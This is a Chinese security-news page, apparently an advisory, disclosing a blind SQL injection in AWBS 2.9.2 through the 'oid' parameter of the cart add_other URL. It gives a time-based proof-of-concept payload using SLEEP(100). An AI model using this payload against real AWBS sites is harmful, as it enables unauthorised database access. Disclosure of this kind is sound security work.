主页 / 网络安全 /

AWBS 2.9.2 Blind SQL 注入0day

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  影响版本:AWBS 2.9.2

  官方网站:http://.awbs.

  漏洞类型:SQL注入

  漏洞描述:

  ---Vulnerability---

  http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]

  =============================================================================================

  ---PoC Using Time-Based Blind SQL Injection---

  https://.vulnerablehost./cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='

 

上一篇:金山毒霸多个sql注入及XSS漏洞和修复 下一篇:phpcms V9 BLind SQL 注入漏洞0day

网络安全培训

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by